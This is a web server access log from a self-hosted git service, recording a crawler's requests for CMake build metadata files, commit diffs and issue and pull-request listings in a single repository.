[Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" -[17/Feb/2026:19:49:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json?display=source" [Client 74.7.227.38] [Length 12795] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:19:49:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json?display=rendered" [Client 74.7.227.38] [Length 11151] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:19:49:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json?display=rendered" [Client 74.7.227.38] [Length 11151] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:19:49:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json?display=source" [Client 74.7.227.38] [Length 13622] [Gzip 4.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:19:49:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json?display=rendered" [Client 74.7.227.38] [Length 11155] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" -[17/Feb/2026:19:49:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json?display=source" [Client 74.7.227.38] [Length 13747] [Gzip 4.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:19:49:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json?display=rendered" [Client 74.7.227.38] [Length 11157] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:19:49:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json?display=rendered" [Client 74.7.227.38] [Length 11161] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:19:49:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json?display=rendered" [Client 74.7.227.38] [Length 11163] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" -[17/Feb/2026:19:49:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json?display=source" [Client 74.7.227.38] [Length 13746] [Gzip 4.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:19:49:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json?display=source" [Client 74.7.227.38] [Length 13751] [Gzip 4.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:19:49:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json?display=rendered" [Client 74.7.227.38] [Length 11162] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" -[17/Feb/2026:19:49:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json?display=rendered" [Client 74.7.227.38] [Length 11156] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:19:49:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json?display=rendered" [Client 74.7.227.38] [Length 11162] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:19:49:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json?display=source" [Client 74.7.227.38] [Length 12795] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:19:49:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json?display=rendered" [Client 74.7.227.38] [Length 11163] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:19:49:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json?display=rendered" [Client 74.7.227.38] [Length 11153] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:19:49:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json?display=source" [Client 74.7.227.38] [Length 13749] [Gzip 4.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:19:49:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json?display=rendered" [Client 74.7.227.38] [Length 11156] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:19:49:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json?display=source" [Client 74.7.227.38] [Length 19999] [Gzip 9.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" -[17/Feb/2026:19:49:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json?display=source" [Client 74.7.227.38] [Length 13621] [Gzip 4.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:19:49:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json?display=rendered" [Client 74.7.227.38] [Length 11162] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:19:49:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json?display=source" [Client 74.7.227.38] [Length 35754] [Gzip 10.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:19:49:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json?display=rendered" [Client 74.7.227.38] [Length 11152] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:19:49:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json?display=rendered" [Client 74.7.227.38] [Length 11164] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" -[17/Feb/2026:19:49:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6?files=PostgresMonitor%2fbuild%2fPostgresWatchdog%2fxref-PostgresWatchdog.html" [Client 74.7.227.38] [Length 18192] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" -[17/Feb/2026:19:49:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2f.cmake%2fapi%2fv1%2fquery%2fclient-vscode%2fquery.json" [Client 74.7.227.38] [Length 24939] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:19:49:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json?display=source" [Client 74.7.227.38] [Length 14334] [Gzip 5.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:19:49:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json?display=source" [Client 74.7.227.38] [Length 14336] [Gzip 5.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:19:49:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json?display=source" [Client 74.7.227.38] [Length 14335] [Gzip 5.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:19:49:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json?display=source" [Client 74.7.227.38] [Length 14334] [Gzip 5.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:19:49:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json?display=source" [Client 74.7.227.38] [Length 14339] [Gzip 5.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:19:49:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json?display=rendered" [Client 74.7.227.38] [Length 11143] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:19:49:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json?display=source" [Client 74.7.227.38] [Length 14332] [Gzip 5.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:19:49:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresPatrol/build/PostgresPatrol/base_library.zip" [Client 74.7.227.38] [Length 1037] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/base_library.zip" -[17/Feb/2026:19:49:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10153] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&milestone=-1&state=all&type=all" -[17/Feb/2026:19:49:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 74.7.227.38] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/index.html" -[17/Feb/2026:19:49:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/Analysis-00.toc" [Client 74.7.227.38] [Length 31862] [Gzip 12.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol" -[17/Feb/2026:19:49:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10156] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&milestone=-1&state=all&type=all" -[17/Feb/2026:19:49:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9963] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:49:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 9998] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:49:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83?files=PostgresMonitor%2fbuild%2fPostgresWatchdog%2fPostgresWatchdog.pkg" [Client 74.7.227.38] [Length 17032] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" -[17/Feb/2026:19:49:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10168] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:49:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10196] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 